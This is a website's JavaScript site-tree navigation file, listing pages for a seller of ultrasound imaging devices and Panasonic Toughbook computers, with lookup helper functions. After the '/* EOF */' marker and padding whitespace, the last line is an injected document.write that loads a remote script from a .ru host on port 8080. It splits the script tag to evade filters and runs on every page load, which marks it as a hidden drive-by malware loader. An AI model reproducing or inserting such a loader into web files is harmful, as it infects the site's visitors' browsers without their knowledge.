/* [nodename, id, name, navigationtext, href, isnavigation, childs[], templatename] */

function jdecode(s) {
    s = s.replace(/\+/g, "%20")
    return unescape(s);
}

var POS_NODENAME=0;
var POS_ID=1;
var POS_NAME=2;
var POS_NAVIGATIONTEXT=3;
var POS_HREF=4;
var POS_ISNAVIGATION=5;
var POS_CHILDS=6;
var POS_TEMPLATENAME=7;
var theSitetree=[ 
	['PAGE','4436',jdecode('Home'),jdecode(''),'/4436.html','true',[],''],
	['PAGE','13016',jdecode('Ultrasound+Imaging+Products'),jdecode(''),'/13016/index.html','true',[ 
		['PAGE','13363',jdecode('Voyager'),jdecode(''),'/13016/13363.html','true',[],''],
		['PAGE','13301',jdecode('Spark'),jdecode(''),'/13016/13301.html','true',[],''],
		['PAGE','13332',jdecode('Seeker'),jdecode(''),'/13016/13332.html','true',[],'']
	],''],
	['PAGE','18137',jdecode('Ultrasound+Images'),jdecode(''),'/18137/index.html','true',[ 
		['PAGE','18103',jdecode('Voyager'),jdecode(''),'/18137/18103.html','true',[],''],
		['PAGE','18284',jdecode('Spark'),jdecode(''),'/18137/18284.html','true',[],''],
		['PAGE','18319',jdecode('Seeker'),jdecode(''),'/18137/18319.html','true',[],'']
	],''],
	['PAGE','45912',jdecode('ArdentView'),jdecode(''),'/45912.html','true',[],''],
	['PAGE','24231',jdecode('Panasonic+Toughbook%28R%29+Computers'),jdecode(''),'/24231/index.html','true',[ 
		['PAGE','24587',jdecode('T2'),jdecode(''),'/24231/24587.html','true',[],''],
		['PAGE','24525',jdecode('CF73'),jdecode(''),'/24231/24525.html','true',[],''],
		['PAGE','24556',jdecode('CF18+%28fully+rugged%29'),jdecode(''),'/24231/24556.html','true',[],''],
		['PAGE','28141',jdecode('CF29+%28fully+rugged%29'),jdecode(''),'/24231/28141.html','true',[],'']
	],''],
	['PAGE','28101',jdecode('Buy+Now'),jdecode(''),'/28101/index.html','true',[ 
		['PAGE','29214',jdecode('Ultrasound+Imaging+Products'),jdecode(''),'/28101/29214.html','true',[],''],
		['PAGE','29245',jdecode('Panasonic+Toughbook%28R%29+Computer+Products'),jdecode(''),'/28101/29245.html','true',[],'']
	],''],
	['PAGE','31701',jdecode('Support'),jdecode(''),'/31701.html','true',[],''],
	['PAGE','6901',jdecode('About+us'),jdecode(''),'/6901.html','true',[],''],
	['PAGE','29801',jdecode('Jobs'),jdecode(''),'/29801.html','true',[],''],
	['PAGE','7009',jdecode('Contact'),jdecode(''),'/7009/index.html','true',[ 
		['PAGE','18002',jdecode('Directions'),jdecode(''),'/7009/18002.html','true',[],''],
		['PAGE','14804',jdecode('Feedback'),jdecode(''),'/7009/14804/index.html','true',[ 
			['PAGE','14850',jdecode('Feedback+%28follow+up+page%29'),jdecode(''),'/7009/14804/14850.html','false',[],'']
		],'']
	],'']];
var siteelementCount=25;
theSitetree.topTemplateName='Movement';
					                                                                    
theSitetree.getById = function(id, ar) {												
							if (typeof(ar) == 'undefined')                              
								ar = this;                                              
							for (var i=0; i < ar.length; i++) {                         
								if (ar[i][POS_ID] == id)                                
									return ar[i];                                       
								if (ar[i][POS_CHILDS].length > 0) {                     
									var result=this.getById(id, ar[i][POS_CHILDS]);     
									if (result != null)                                 
										return result;                                  
								}									                    
							}                                                           
							return null;                                                
					  };                                                                
					                                                                    
theSitetree.getParentById = function(id, ar) {											
						if (typeof(ar) == 'undefined')                              	
							ar = this;                                             		
						for (var i=0; i < ar.length; i++) {                        		
							for (var j = 0; j < ar[i][POS_CHILDS].length; j++) {   		
								if (ar[i][POS_CHILDS][j][POS_ID] == id) {          		
									// child found                                 		
									return ar[i];                                  		
								}                                                  		
								var result=this.getParentById(id, ar[i][POS_CHILDS]);   
								if (result != null)                                 	
									return result;                                  	
							}                                                       	
						}                                                           	
						return null;                                                	
					 }								                                    
					                                                                    
theSitetree.getName = function(id) {                                                    
						var elem = this.getById(id);                                    
						if (elem != null)                                               
							return elem[POS_NAME];                                      
						return null;	                                                
					  };			                                                    
theSitetree.getNavigationText = function(id) {                                          
						var elem = this.getById(id);                                    
						if (elem != null)                                               
							return elem[POS_NAVIGATIONTEXT];                            
						return null;	                                                
					  };			                                                    
					                                                                    
theSitetree.getHREF = function(id) {                                                    
						var elem = this.getById(id);                                    
						if (elem != null)                                               
							return elem[POS_HREF];                                      
						return null;	                                                
					  };			                                                    
					                                                                    
theSitetree.getIsNavigation = function(id) {                                            
						var elem = this.getById(id);                                    
						if (elem != null)                                               
							return elem[POS_ISNAVIGATION];                              
						return null;	                                                
					  };			                                                    
					                                                                    
theSitetree.getTemplateName = function(id, lastTemplateName, ar) {             		 
	                                                                                 
	if (typeof(lastTemplateName) == 'undefined')                                     
		lastTemplateName = this.topTemplateName;	                                 
	if (typeof(ar) == 'undefined')                                                   
		ar = this;                                                                   
		                                                                             
	for (var i=0; i < ar.length; i++) {                                              
		var actTemplateName = ar[i][POS_TEMPLATENAME];                               
		                                                                             
		if (actTemplateName == '')                                                   
			actTemplateName = lastTemplateName;		                                 
		                                                                             
		if (ar[i][POS_ID] == id) {                                			         
			return actTemplateName;                                                  
		}	                                                                         
		                                                                             
		if (ar[i][POS_CHILDS].length > 0) {                                          
			var result=this.getTemplateName(id, actTemplateName, ar[i][POS_CHILDS]); 
			if (result != null)                                                      
				return result;                                                       
		}									                                         
	}                                                                                
	return null;                                                                     
	};                                                                               
/* EOF */					                                                            


document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Gibibyte.js"></scr'+'ipt>');